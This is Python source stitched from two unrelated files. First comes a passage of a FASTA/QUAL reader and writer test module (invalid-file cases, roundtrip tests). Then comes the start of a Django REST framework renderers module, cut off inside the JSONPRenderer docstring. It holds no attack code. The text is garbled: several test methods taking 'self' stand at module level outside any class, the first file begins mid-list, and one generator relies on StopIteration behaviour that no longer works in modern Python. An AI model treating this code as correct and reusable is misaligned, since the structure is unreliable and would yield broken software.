        # fasta and qual with blank line within sequence
        ('fasta_invalid_blank_line_after_header', {}, FASTAFormatError,
         'whitespace-only'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_blank_line_after_header')},
         QUALFormatError, 'whitespace-only'),

        # fasta and qual with whitespace-only line within sequence
        ('fasta_invalid_whitespace_only_line_within_sequence',
         {}, FASTAFormatError, 'whitespace-only'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_whitespace_line_in_seq')},
         QUALFormatError, 'whitespace-only'),

        # fasta and qual with whitespace-only line after header
        ('fasta_invalid_whitespace_line_after_header',
         {}, FASTAFormatError, 'whitespace-only'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_ws_line_after_header')},
         QUALFormatError, 'whitespace-only'),

        # fasta and qual missing record data (first record)
        ('fasta_invalid_missing_seq_data_first', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_missing_qual_scores_first')},
         QUALFormatError, 'without quality scores'),

        # fasta and qual missing record data (middle record)
        ('fasta_invalid_missing_seq_data_middle', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_3_seqs_defaults',
         {'qual':
          get_data_path('qual_invalid_missing_qual_scores_middle')},
         QUALFormatError, 'without quality scores'),

        # fasta and qual missing record data (last record)
        ('fasta_invalid_missing_seq_data_last', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_missing_qual_scores_last')},
         QUALFormatError, 'without quality scores'),

        # fasta and qual in legacy format (;)
        ('fasta_invalid_legacy_format', {}, FASTAFormatError,
         'non-header.*1st'),
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_legacy_format')},
         QUALFormatError, 'non-header.*1st'),

        # qual file with an extra record
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_3_seqs_defaults_extra')},
         FASTAFormatError, 'QUAL file has more'),

        # fasta file with an extra record
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_2_seqs_defaults')},
         FASTAFormatError, 'FASTA file has more'),

        # id mismatch between fasta and qual
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_3_seqs_defaults_id_mismatch')},
         FASTAFormatError,
         'IDs do not match.*\'s_e_q_2\' != \'s_e_q_42\''),

        # description mismatch between fasta and qual
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_3_seqs_defaults_desc_mismatch')},
         FASTAFormatError,
         'Descriptions do not match.*\'desc 2\' != \'desc 42\''),

        # sequence and quality score length mismatch between fasta and qual
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_3_seqs_defaults_length_mismatch')},
         ValueError,
         'Number of positional metadata values \(3\) must match the '
         'number of characters in the sequence \(4\)\.'),

        # invalid qual scores (string value can't be converted to integer)
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_qual_scores_string')},
         QUALFormatError,
         'quality scores to integers:\n100 0 1a -42'),

        # invalid qual scores (float value can't be converted to integer)
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_qual_scores_float')},
         QUALFormatError,
         'quality scores to integers:\n42 41.0 39 40'),

        # invalid qual scores (negative integer)
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_qual_scores_negative')},
         QUALFormatError,
         'Quality scores must be greater than or equal to zero\.'),

        # invalid qual scores (over 255)
        ('fasta_3_seqs_defaults',
         {'qual': get_data_path('qual_invalid_qual_scores_over_255')},
         QUALFormatError,
         'quality score\(s\) greater than 255'),

        # misc. invalid files used elsewhere in the tests
        ('fasta_invalid_after_10_seqs', {}, FASTAFormatError,
         'without sequence data'),
        ('fasta_id_whitespace_replacement_none', {}, FASTAFormatError,
         'whitespace-only'),
        ('fasta_description_newline_replacement_none', {},
         FASTAFormatError, 'whitespace-only')
    ]))
# extensive tests for fasta -> generator reader since it is used by all
# other fasta -> object readers
def test_fasta_to_generator_valid_files(self):
    """Parse every valid fasta (and fasta+qual pair) and compare records."""
    test_cases = (self.empty, self.single, self.multi,
                  self.odd_labels_different_type,
                  self.sequence_collection_different_type,
                  self.lowercase_seqs)

    # Strategy:
    # for each fasta file, read it without its corresponding qual file,
    # and ensure observed vs. expected match, ignoring quality scores in
    # expected. next, parse the current fasta file with each
    # corresponding quality file and ensure that observed vs. expected
    # match, this time taking quality scores into account. this
    # sufficiently exercises parsing a standalone fasta file and paired
    # fasta/qual files
    for expected, kwargs, fasta_fps, qual_fps in test_cases:
        for fasta_fp in fasta_fps:
            observed = list(_fasta_to_generator(fasta_fp, **kwargs))
            self.assertEqual(len(observed), len(expected))
            for obs_seq, exp_seq in zip(observed, expected):
                exp_no_qual = exp_seq.copy()
                del exp_no_qual.positional_metadata['quality']
                self.assertEqual(obs_seq, exp_no_qual)

            for qual_fp in qual_fps:
                observed = list(_fasta_to_generator(fasta_fp, qual=qual_fp,
                                                    **kwargs))
                self.assertEqual(len(observed), len(expected))
                for obs_seq, exp_seq in zip(observed, expected):
                    self.assertEqual(obs_seq, exp_seq)
def test_fasta_to_generator_invalid_files(self):
    """Each invalid fixture must raise its documented error type/message."""
    for case in self.invalid_fps:
        fp, kwargs, err_cls, err_regex = case
        with six.assertRaisesRegex(self, err_cls, err_regex):
            list(_fasta_to_generator(fp, **kwargs))
# light testing of fasta -> object readers to ensure interface is present
# and kwargs are passed through. extensive testing of underlying reader is
# performed above
def test_fasta_to_any_sequence(self):
    """Exercise each fasta -> single-sequence reader (interface + kwargs)."""
    for constructor, reader_fn in ((Sequence,
                                    _fasta_to_biological_sequence),
                                   (partial(DNA, validate=False,
                                            lowercase='introns'),
                                    partial(_fasta_to_dna_sequence,
                                            validate=False,
                                            lowercase='introns')),
                                   (partial(RNA, validate=False,
                                            lowercase='introns'),
                                    partial(_fasta_to_rna_sequence,
                                            validate=False,
                                            lowercase='introns')),
                                   (partial(Protein, lowercase='introns'),
                                    partial(_fasta_to_protein_sequence,
                                            validate=False,
                                            lowercase='introns'))):

        # empty file
        empty_fp = get_data_path('empty')
        with six.assertRaisesRegex(self, ValueError, '1st sequence'):
            reader_fn(empty_fp)
        with six.assertRaisesRegex(self, ValueError, '1st sequence'):
            reader_fn(empty_fp, qual=empty_fp)

        # the sequences in the following files don't necessarily make sense
        # for each of the sequence object types that they're read into
        # (e.g., reading a protein sequence into a dna sequence object).
        # however, for the purposes of testing the various
        # fasta -> sequence readers, this works out okay as it is valid to
        # construct a sequence object with invalid characters. we're
        # interested in testing the reading logic here, and don't care so
        # much about constructing semantically-meaningful/valid sequence
        # objects

        # file with only 1 seq, get first
        fasta_fps = list(map(get_data_path,
                             ['fasta_single_seq', 'fasta_max_width_1']))
        for fasta_fp in fasta_fps:
            exp = constructor(
                'ACGT-acgt.',
                metadata={'id': 'seq1', 'description': 'desc1'})

            obs = reader_fn(fasta_fp)
            self.assertEqual(obs, exp)

            # with a qual file the same record gains quality metadata
            exp.positional_metadata.insert(
                0, 'quality',
                np.asarray([10, 20, 30, 10, 0, 0, 0, 255, 1, 255],
                           dtype=np.uint8))
            qual_fps = list(map(get_data_path,
                                ['qual_single_seq', 'qual_max_width_1']))
            for qual_fp in qual_fps:
                obs = reader_fn(fasta_fp, qual=qual_fp)
                self.assertEqual(obs, exp)

        # file with multiple seqs
        fasta_fps = list(map(get_data_path,
                             ['fasta_multi_seq', 'fasta_max_width_5']))
        qual_fps = list(map(get_data_path,
                            ['qual_multi_seq', 'qual_max_width_5']))
        for fasta_fp in fasta_fps:
            # get first
            exp = constructor(
                'ACGT-acgt.',
                metadata={'id': 'seq1', 'description': 'desc1'})
            obs = reader_fn(fasta_fp)
            self.assertEqual(obs, exp)

            exp.positional_metadata.insert(
                0, 'quality',
                np.asarray([10, 20, 30, 10, 0, 0, 0, 255, 1, 255],
                           dtype=np.uint8))
            for qual_fp in qual_fps:
                obs = reader_fn(fasta_fp, qual=qual_fp)
                self.assertEqual(obs, exp)

            # get middle
            exp = constructor('ACGTTGCAccGG',
                              metadata={'id': '', 'description': ''})
            obs = reader_fn(fasta_fp, seq_num=4)
            self.assertEqual(obs, exp)

            exp.positional_metadata.insert(
                0, 'quality',
                np.asarray([55, 10, 0, 99, 1, 1, 8, 77, 40, 10, 10, 0],
                           dtype=np.uint8))
            for qual_fp in qual_fps:
                obs = reader_fn(fasta_fp, seq_num=4, qual=qual_fp)
                self.assertEqual(obs, exp)

            # get last
            exp = constructor(
                'pQqqqPPQQQ',
                metadata={'id': 'proteinseq',
                          'description':
                              'detailed description \t\twith new lines'})
            obs = reader_fn(fasta_fp, seq_num=6)
            self.assertEqual(obs, exp)

            exp.positional_metadata.insert(
                0, 'quality',
                np.asarray([42, 42, 255, 255, 42, 42, 42, 42, 42, 43],
                           dtype=np.uint8))
            for qual_fp in qual_fps:
                obs = reader_fn(fasta_fp, seq_num=6, qual=qual_fp)
                self.assertEqual(obs, exp)

            # seq_num too large
            with six.assertRaisesRegex(self, ValueError, '8th sequence'):
                reader_fn(fasta_fp, seq_num=8)
            for qual_fp in qual_fps:
                with six.assertRaisesRegex(self, ValueError,
                                           '8th sequence'):
                    reader_fn(fasta_fp, seq_num=8, qual=qual_fp)

            # seq_num too small
            with six.assertRaisesRegex(self, ValueError, '`seq_num`=0'):
                reader_fn(fasta_fp, seq_num=0)
            for qual_fp in qual_fps:
                with six.assertRaisesRegex(self, ValueError,
                                           '`seq_num`=0'):
                    reader_fn(fasta_fp, seq_num=0, qual=qual_fp)
def test_fasta_to_sequence_collection_and_alignment(self):
    """Read FASTA (+ optional QUAL) files into SequenceCollection/Alignment.

    Runs every fixture through both object readers. Without a qual file the
    observed sequences must equal the expected ones minus quality scores;
    with a qual file they must compare equal including quality.
    """
    test_cases = (self.empty, self.single,
                  self.sequence_collection_different_type,
                  self.lowercase_seqs)

    for constructor, reader_fn in ((SequenceCollection,
                                    _fasta_to_sequence_collection),
                                   (Alignment,
                                    _fasta_to_alignment)):
        # see comment in test_fasta_to_generator_valid_files (above) for
        # testing strategy
        for exp_list, kwargs, fasta_fps, qual_fps in test_cases:
            exp = constructor(exp_list)

            for fasta_fp in fasta_fps:
                obs = reader_fn(fasta_fp, **kwargs)

                # no qual file given: compare element-wise against copies
                # of the expected sequences with 'quality' removed
                self.assertEqual(len(obs), len(exp))
                for o, e in zip(obs, exp):
                    e = e.copy()
                    del e.positional_metadata['quality']
                    self.assertEqual(o, e)

                for qual_fp in qual_fps:
                    obs = reader_fn(fasta_fp, qual=qual_fp, **kwargs)
                    self.assertEqual(obs, exp)
class WriterTests(TestCase):
    """Tests for the object -> FASTA (and optional QUAL) writers.

    ``setUp`` builds a menagerie of sequences (varying types, lengths,
    metadata, and quality scores) plus generator factories, then pairs each
    generator with writer kwargs and the filepaths of the expected FASTA/QUAL
    output.
    """

    def setUp(self):
        # Individual sequences used by the generator factories below.
        self.bio_seq1 = DNA(
            'ACGT-acgt.',
            metadata={'id': 'seq1', 'description': 'desc1'},
            positional_metadata={'quality': [10, 20, 30, 10, 0, 0, 0, 255,
                                             1, 255]},
            lowercase='introns')
        self.bio_seq2 = DNA(
            'A',
            metadata={'id': ' \n \nseq \t2 '},
            positional_metadata={'quality': [42]},
            lowercase='introns')
        self.bio_seq3 = RNA(
            'AACGGuA',
            metadata={'description': 'desc3'},
            positional_metadata={'quality': [0, 0, 0, 0, 0, 0, 0]},
            lowercase='introns')
        self.dna_seq = DNA(
            'ACGTTGCAccGG',
            positional_metadata={'quality': [55, 10, 0, 99, 1, 1, 8, 77, 40,
                                             10, 10, 0]},
            lowercase='introns')
        self.rna_seq = RNA('ACGUU',
                           positional_metadata={'quality': [10, 9, 8, 7, 6]},
                           lowercase='introns')
        self.prot_seq = Protein(
            'pQqqqPPQQQ',
            metadata={'id': 'proteinseq',
                      'description': "\ndetailed\ndescription \t\twith "
                                     " new\n\nlines\n\n\n"},
            positional_metadata={'quality': [42, 42, 255, 255, 42, 42, 42, 42,
                                             42, 43]},
            lowercase='introns')

        # Sequences with tabs/newlines in ids and descriptions (to exercise
        # whitespace/newline replacement) collected into both container types.
        seqs = [
            RNA('UUUU',
                metadata={'id': 's\te\tq\t1', 'description': 'desc\n1'},
                positional_metadata={'quality': [1234, 0, 0, 2]},
                lowercase='introns'),
            Sequence(
                'CATC',
                metadata={'id': 's\te\tq\t2', 'description': 'desc\n2'},
                positional_metadata={'quality': [1, 11, 111, 11112]}),
            Protein('sits',
                    metadata={'id': 's\te\tq\t3', 'description': 'desc\n3'},
                    positional_metadata={'quality': [12345, 678909, 999999,
                                                     4242424242]},
                    validate=False)
        ]
        self.seq_coll = SequenceCollection(seqs)
        self.align = Alignment(seqs)

        # NOTE(review): raising StopIteration inside a generator is an error
        # under PEP 479 (Python 3.7+); this relies on pre-3.7 semantics.
        def empty_gen():
            raise StopIteration()
            yield

        def single_seq_gen():
            yield self.bio_seq1

        # generate sequences with descriptions containing newlines (to test
        # description_newline_replacement)
        def newline_description_gen():
            yield self.prot_seq
            yield DNA('AGGAGAATA',
                      metadata={'id': 'foo', 'description': '\n\n\n\n'},
                      positional_metadata={'quality': range(9)},
                      lowercase='introns')

        # generate sequences with ids containing whitespace (to test
        # id_whitespace_replacement)
        def whitespace_id_gen():
            yield self.bio_seq2
            yield RNA('UA', metadata={'id': '\n\t \t', 'description': 'a\nb'},
                      positional_metadata={'quality': [1000, 1]})

        # multiple sequences of mixed types, lengths, and metadata. lengths are
        # chosen to exercise various splitting cases when testing max_width,
        # including exercising the different splitting algorithms used for
        # sequence data vs. quality scores
        def multi_seq_gen():
            for seq in (self.bio_seq1, self.bio_seq2, self.bio_seq3,
                        self.dna_seq, self.rna_seq, self.prot_seq):
                yield seq

        # can be serialized if no qual file is provided, else it should raise
        # an error because one seq has qual scores and the other doesn't
        def mixed_qual_score_gen():
            missing_qual_seq = DNA(
                'AAAAT', metadata={'id': 'da,dadadada',
                                   'description': '10 hours'},
                lowercase='introns')
            for seq in self.bio_seq1, missing_qual_seq:
                yield seq

        self.mixed_qual_score_gen = mixed_qual_score_gen()

        # store sequence generator to serialize, writer kwargs (if any), and
        # fasta and qual filepaths of expected results
        self.objs_fps = list(map(lambda e: (e[0], e[1], get_data_path(e[2]),
                                            get_data_path(e[3])), [
            (empty_gen(), {}, 'empty', 'empty'),

            (single_seq_gen(), {'lowercase': 'introns'}, 'fasta_single_seq',
             'qual_single_seq'),

            # no splitting of sequence or qual data across lines b/c max_width
            # is sufficiently large
            (single_seq_gen(), {'max_width': 32, 'lowercase': 'introns'},
             'fasta_single_seq',
             'qual_single_seq'),

            # splitting algorithm for sequence and qual scores is different;
            # make sure individual qual scores aren't split across lines even
            # if they exceed max_width
            (single_seq_gen(), {'max_width': 1, 'lowercase': 'introns'},
             'fasta_max_width_1',
             'qual_max_width_1'),

            (multi_seq_gen(),
             {'lowercase': 'introns'}, 'fasta_multi_seq', 'qual_multi_seq'),

            (multi_seq_gen(),
             {'max_width': 5, 'lowercase': 'introns'}, 'fasta_max_width_5',
             'qual_max_width_5'),

            (newline_description_gen(),
             {'description_newline_replacement': ':-)',
              'lowercase': 'introns'},
             'fasta_description_newline_replacement_multi_char',
             'qual_description_newline_replacement_multi_char'),

            (newline_description_gen(),
             {'description_newline_replacement': '',
              'lowercase': 'introns'},
             'fasta_description_newline_replacement_empty_str',
             'qual_description_newline_replacement_empty_str',),

            (newline_description_gen(),
             {'description_newline_replacement': None,
              'lowercase': 'introns'},
             'fasta_description_newline_replacement_none',
             'qual_description_newline_replacement_none'),

            (whitespace_id_gen(),
             {'id_whitespace_replacement': '>:o'},
             'fasta_id_whitespace_replacement_multi_char',
             'qual_id_whitespace_replacement_multi_char'),

            (whitespace_id_gen(),
             {'id_whitespace_replacement': ''},
             'fasta_id_whitespace_replacement_empty_str',
             'qual_id_whitespace_replacement_empty_str'),

            (whitespace_id_gen(),
             {'id_whitespace_replacement': None},
             'fasta_id_whitespace_replacement_none',
             'qual_id_whitespace_replacement_none'),
        ]))

        def blank_seq_gen():
            for seq in self.bio_seq1, Sequence(''):
                yield seq

        # generators or parameter combos that cannot be written in fasta
        # format, paired with kwargs (if any), error type, and expected error
        # message regexp
        self.invalid_objs = [
            (blank_seq_gen(), {}, ValueError, '2nd.*empty'),
            (single_seq_gen(),
             {'max_width': 0}, ValueError, 'max_width=0'),
            (multi_seq_gen(), {'id_whitespace_replacement': '-\n_'},
             ValueError, 'Newline character'),
            (multi_seq_gen(), {'description_newline_replacement': '-.-\n'},
             ValueError, 'Newline character'),
            (mixed_qual_score_gen(), {'qual': io.StringIO()}, ValueError,
             '2nd sequence.*does not have quality scores')
        ]

    # extensive tests for generator -> fasta writer since it is used by all
    # other object -> fasta writers
    def test_generator_to_fasta_no_qual(self):
        """Each generator fixture serializes to the expected FASTA text."""
        # test writing standalone fasta (i.e., without a qual file)
        for obj, kwargs, fp, _ in self.objs_fps:
            fh = io.StringIO()
            _generator_to_fasta(obj, fh, **kwargs)
            obs = fh.getvalue()
            fh.close()

            with io.open(fp) as fh:
                exp = fh.read()

            self.assertEqual(obs, exp)

    def test_generator_to_fasta_mixed_qual_scores(self):
        """Sequences with and without quality may be mixed when no qual
        output file is requested."""
        # test writing some sequences with qual scores and some without is
        # possible if no qual output file is specified
        fh = io.StringIO()
        _generator_to_fasta(self.mixed_qual_score_gen, fh, lowercase='introns')
        obs = fh.getvalue()
        fh.close()

        with io.open(get_data_path('fasta_mixed_qual_scores')) as fh:
            exp = fh.read()

        self.assertEqual(obs, exp)

    def test_generator_to_fasta_with_qual(self):
        """Writing FASTA together with a QUAL file matches both fixtures."""
        # test writing fasta and qual files
        for obj, kwargs, fasta_fp, qual_fp in self.objs_fps:
            if qual_fp is not None:
                fasta_fh = io.StringIO()
                qual_fh = io.StringIO()
                _generator_to_fasta(obj, fasta_fh, qual=qual_fh, **kwargs)
                obs_fasta = fasta_fh.getvalue()
                obs_qual = qual_fh.getvalue()
                fasta_fh.close()
                qual_fh.close()

                with io.open(fasta_fp) as fh:
                    exp_fasta = fh.read()
                with io.open(qual_fp) as fh:
                    exp_qual = fh.read()

                self.assertEqual(obs_fasta, exp_fasta)
                self.assertEqual(obs_qual, exp_qual)

    def test_generator_to_fasta_invalid_input(self):
        """Unwritable inputs raise the documented error type and message."""
        for obj, kwargs, error_type, error_msg_regexp in self.invalid_objs:
            fh = io.StringIO()
            with six.assertRaisesRegex(self, error_type, error_msg_regexp):
                _generator_to_fasta(obj, fh, **kwargs)
            fh.close()

    def test_generator_to_fasta_sequence_lowercase_exception(self):
        """``lowercase`` on a plain Sequence (no case support) raises."""
        seq = Sequence('ACgt', metadata={'id': ''})
        fh = io.StringIO()
        with six.assertRaisesRegex(self, AttributeError,
                                   "lowercase specified but class Sequence "
                                   "does not support lowercase "
                                   "functionality"):
            _generator_to_fasta(SequenceCollection([seq]), fh,
                                lowercase='introns')
        fh.close()

    # light testing of object -> fasta writers to ensure interface is present
    # and kwargs are passed through. extensive testing of underlying writer is
    # performed above
    def test_any_sequence_to_fasta(self):
        """Each single-sequence writer honors defaults and kwargs."""
        # store writer function, sequence object to write, expected
        # fasta filepath for default parameters, expected fasta filepath for
        # non-defaults, and expected qual filepath for non-defaults
        id_ = 'f o o'
        desc = 'b\na\nr'
        test_data = (
            (_biological_sequence_to_fasta,
             Sequence('ACgt', metadata={'id': id_, 'description': desc},
                      positional_metadata={'quality': range(1, 5)}),
             ('fasta_single_bio_seq_defaults',
              'fasta_single_bio_seq_non_defaults',
              'qual_single_bio_seq_non_defaults')),
            (partial(_dna_sequence_to_fasta, lowercase='introns'),
             DNA('TAcg', metadata={'id': id_, 'description': desc},
                 positional_metadata={'quality': range(4)},
                 lowercase='introns'),
             ('fasta_single_dna_seq_defaults',
              'fasta_single_dna_seq_non_defaults',
              'qual_single_dna_seq_non_defaults')),
            (partial(_rna_sequence_to_fasta, lowercase='introns'),
             RNA('uaCG', metadata={'id': id_, 'description': desc},
                 positional_metadata={'quality': range(2, 6)},
                 lowercase='introns'),
             ('fasta_single_rna_seq_defaults',
              'fasta_single_rna_seq_non_defaults',
              'qual_single_rna_seq_non_defaults')),
            (partial(_protein_sequence_to_fasta, lowercase='introns'),
             Protein('PqQ', metadata={'id': id_, 'description': desc},
                     positional_metadata={'quality': [42, 41, 40]},
                     lowercase='introns'),
             ('fasta_single_prot_seq_defaults',
              'fasta_single_prot_seq_non_defaults',
              'qual_single_prot_seq_non_defaults')))

        for fn, obj, fps in test_data:
            defaults_fp, non_defaults_fasta_fp, non_defaults_qual_fp = fps

            # test writing with default parameters
            fh = io.StringIO()
            fn(obj, fh)
            obs = fh.getvalue()
            fh.close()

            with io.open(get_data_path(defaults_fp)) as fh:
                exp = fh.read()

            self.assertEqual(obs, exp)

            # test writing with non-defaults
            fasta_fh = io.StringIO()
            qual_fh = io.StringIO()
            fn(obj, fasta_fh, id_whitespace_replacement='-',
               description_newline_replacement='_', max_width=1, qual=qual_fh)
            obs_fasta = fasta_fh.getvalue()
            obs_qual = qual_fh.getvalue()
            fasta_fh.close()
            qual_fh.close()

            with io.open(get_data_path(non_defaults_fasta_fp)) as fh:
                exp_fasta = fh.read()
            with io.open(get_data_path(non_defaults_qual_fp)) as fh:
                exp_qual = fh.read()

            self.assertEqual(obs_fasta, exp_fasta)
            self.assertEqual(obs_qual, exp_qual)

    def test_any_sequences_to_fasta(self):
        """Collection/alignment writers honor kwargs and reject lowercase."""
        for fn, obj in ((_sequence_collection_to_fasta, self.seq_coll),
                        (_alignment_to_fasta, self.align)):
            # test writing with default parameters
            fh = io.StringIO()
            fn(obj, fh)
            obs = fh.getvalue()
            fh.close()

            with io.open(get_data_path('fasta_3_seqs_defaults')) as fh:
                exp = fh.read()

            self.assertEqual(obs, exp)

            # test writing with non-defaults
            fasta_fh = io.StringIO()
            qual_fh = io.StringIO()
            fn(obj, fasta_fh, id_whitespace_replacement='*',
               description_newline_replacement='+', max_width=3, qual=qual_fh)
            obs_fasta = fasta_fh.getvalue()
            obs_qual = qual_fh.getvalue()
            fasta_fh.close()
            qual_fh.close()

            with io.open(get_data_path('fasta_3_seqs_non_defaults')) as fh:
                exp_fasta = fh.read()
            with io.open(get_data_path('qual_3_seqs_non_defaults')) as fh:
                exp_qual = fh.read()

            self.assertEqual(obs_fasta, exp_fasta)
            self.assertEqual(obs_qual, exp_qual)

            # the collection contains a plain Sequence, so lowercase must
            # raise regardless of other kwargs
            fh2 = io.StringIO()
            with six.assertRaisesRegex(self, AttributeError,
                                       "lowercase specified but class "
                                       "Sequence does not support lowercase "
                                       "functionality"):
                fn(obj, fh2, lowercase='introns')
            fh2.close()

            fasta_fh2 = io.StringIO()
            qual_fh2 = io.StringIO()
            with six.assertRaisesRegex(self, AttributeError,
                                       "lowercase specified but class "
                                       "Sequence does not support lowercase "
                                       "functionality"):
                fn(obj, fasta_fh2, id_whitespace_replacement='*',
                   description_newline_replacement='+', max_width=3,
                   qual=qual_fh2, lowercase='introns')
            fasta_fh2.close()
            qual_fh2.close()
class RoundtripTests(TestCase):
    """Read -> write -> read round-trips must be lossless for every reader/
    writer pairing (generator, collection/alignment, and single-sequence)."""

    def test_roundtrip_generators(self):
        """FASTA+QUAL streamed through generator reader/writer is unchanged."""
        # test that fasta and qual files can be streamed into memory and back
        # out to disk using generator reader and writer
        fps = list(map(lambda e: list(map(get_data_path, e)),
                       [('empty', 'empty'),
                        ('fasta_multi_seq_roundtrip',
                         'qual_multi_seq_roundtrip')]))

        for fasta_fp, qual_fp in fps:
            with io.open(fasta_fp) as fh:
                exp_fasta = fh.read()
            with io.open(qual_fp) as fh:
                exp_qual = fh.read()

            fasta_fh = io.StringIO()
            qual_fh = io.StringIO()
            _generator_to_fasta(_fasta_to_generator(fasta_fp, qual=qual_fp),
                                fasta_fh, qual=qual_fh)
            obs_fasta = fasta_fh.getvalue()
            obs_qual = qual_fh.getvalue()
            fasta_fh.close()
            qual_fh.close()

            self.assertEqual(obs_fasta, exp_fasta)
            self.assertEqual(obs_qual, exp_qual)

    def test_roundtrip_sequence_collections_and_alignments(self):
        """Objects survive write-then-read for both container readers."""
        fps = list(map(lambda e: list(map(get_data_path, e)),
                       [('empty', 'empty'),
                        ('fasta_sequence_collection_different_type',
                         'qual_sequence_collection_different_type')]))

        for reader, writer in ((_fasta_to_sequence_collection,
                                _sequence_collection_to_fasta),
                               (_fasta_to_alignment,
                                _alignment_to_fasta)):
            for fasta_fp, qual_fp in fps:
                # read
                obj1 = reader(fasta_fp, qual=qual_fp)

                # write
                fasta_fh = io.StringIO()
                qual_fh = io.StringIO()
                writer(obj1, fasta_fh, qual=qual_fh)
                fasta_fh.seek(0)
                qual_fh.seek(0)

                # read
                obj2 = reader(fasta_fh, qual=qual_fh)
                fasta_fh.close()
                qual_fh.close()

                self.assertEqual(obj1, obj2)

    def test_roundtrip_biological_sequences(self):
        """Single sequences survive write-then-read for every sequence type
        (validation disabled where file contents don't match the alphabet)."""
        fps = list(map(lambda e: list(map(get_data_path, e)),
                       [('fasta_multi_seq_roundtrip',
                         'qual_multi_seq_roundtrip'),
                        ('fasta_sequence_collection_different_type',
                         'qual_sequence_collection_different_type')]))

        for reader, writer in ((_fasta_to_biological_sequence,
                                _biological_sequence_to_fasta),
                               (partial(_fasta_to_dna_sequence,
                                        validate=False),
                                _dna_sequence_to_fasta),
                               (partial(_fasta_to_rna_sequence,
                                        validate=False),
                                _rna_sequence_to_fasta),
                               (partial(_fasta_to_protein_sequence,
                                        validate=False),
                                _protein_sequence_to_fasta)):
            for fasta_fp, qual_fp in fps:
                # read
                obj1 = reader(fasta_fp, qual=qual_fp)

                # write
                fasta_fh = io.StringIO()
                qual_fh = io.StringIO()
                writer(obj1, fasta_fh, qual=qual_fh)
                fasta_fh.seek(0)
                qual_fh.seek(0)

                # read
                obj2 = reader(fasta_fh, qual=qual_fh)
                fasta_fh.close()
                qual_fh.close()

                self.assertEqual(obj1, obj2)
# Allow this test module to be run directly (e.g. ``python test_fasta.py``).
if __name__ == '__main__':
    main()
| |
"""
Renderers are used to serialize a response into specific media types.
They give us a generic way of being able to handle various media types
on the response, such as JSON encoded data or HTML output.
REST framework also provides an HTML renderer that renders the browsable API.
"""
from __future__ import unicode_literals
import json
import django
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.core.paginator import Page
from django.http.multipartparser import parse_header
from django.template import Context, RequestContext, loader, Template
from django.test.client import encode_multipart
from django.utils import six
from django.utils.encoding import smart_text
from django.utils.xmlutils import SimplerXMLGenerator
from django.utils.six.moves import StringIO
from rest_framework import exceptions, serializers, status, VERSION
from rest_framework.compat import SHORT_SEPARATORS, LONG_SEPARATORS, yaml
from rest_framework.exceptions import ParseError
from rest_framework.settings import api_settings
from rest_framework.request import is_form_media_type, override_method
from rest_framework.utils import encoders
from rest_framework.utils.breadcrumbs import get_breadcrumbs
from rest_framework.utils.field_mapping import ClassLookupDict
def zero_as_none(value):
    """Return ``None`` when *value* compares equal to 0, else the value.

    Used to coerce an ``indent=0`` rendering parameter into "no indent".
    """
    if value == 0:
        return None
    return value
class BaseRenderer(object):
    """
    Base class for all renderers.

    Subclasses must set the `media_type` and `format` attributes and
    override the `.render()` method.
    """
    media_type = None
    format = None
    charset = 'utf-8'
    render_style = 'text'

    def render(self, data, accepted_media_type=None, renderer_context=None):
        # Abstract: concrete renderers serialize `data` here.
        message = 'Renderer class requires .render() to be implemented'
        raise NotImplementedError(message)
class JSONRenderer(BaseRenderer):
    """
    Renderer which serializes to JSON.
    """
    media_type = 'application/json'
    format = 'json'
    encoder_class = encoders.JSONEncoder
    ensure_ascii = not api_settings.UNICODE_JSON
    compact = api_settings.COMPACT_JSON

    # We don't set a charset because JSON is a binary encoding,
    # that can be encoded as utf-8, utf-16 or utf-32.
    # See: http://www.ietf.org/rfc/rfc4627.txt
    # Also: http://lucumr.pocoo.org/2013/7/19/application-mimetypes-and-encodings/
    charset = None

    def get_indent(self, accepted_media_type, renderer_context):
        """Return the indent level to use, or None for compact output.

        The media-type parameter takes precedence over the renderer context;
        indent values are clamped to the range 0..8.
        """
        if accepted_media_type:
            # If the media type looks like 'application/json; indent=4',
            # then pretty print the result.
            # Note that we coerce `indent=0` into `indent=None`.
            base_media_type, params = parse_header(accepted_media_type.encode('ascii'))
            try:
                return zero_as_none(max(min(int(params['indent']), 8), 0))
            except (KeyError, ValueError, TypeError):
                # Missing or malformed 'indent' parameter: fall through to
                # the renderer context.
                pass

        # If 'indent' is provided in the context, then pretty print the result.
        # E.g. If we're being called by the BrowsableAPIRenderer.
        return renderer_context.get('indent', None)

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Render `data` into JSON, returning a bytestring.

        `None` data renders as an empty byte string.
        """
        if data is None:
            return bytes()

        renderer_context = renderer_context or {}
        indent = self.get_indent(accepted_media_type, renderer_context)
        # Compact separators only apply when not pretty-printing.
        separators = SHORT_SEPARATORS if (indent is None and self.compact) else LONG_SEPARATORS

        ret = json.dumps(
            data, cls=self.encoder_class,
            indent=indent, ensure_ascii=self.ensure_ascii,
            separators=separators
        )

        # On python 2.x json.dumps() returns bytestrings if ensure_ascii=True,
        # but if ensure_ascii=False, the return type is underspecified,
        # and may (or may not) be unicode.
        # On python 3.x json.dumps() returns unicode strings.
        if isinstance(ret, six.text_type):
            # We always fully escape \u2028 and \u2029 to ensure we output JSON
            # that is a strict javascript subset. If bytes were returned
            # by json.dumps() then we don't have these characters in any case.
            # See: http://timelessrepo.com/json-isnt-a-javascript-subset
            ret = ret.replace('\u2028', '\\u2028').replace('\u2029', '\\u2029')
            return bytes(ret.encode('utf-8'))
        return ret
class JSONPRenderer(JSONRenderer):
    """
    Renderer which serializes to json,
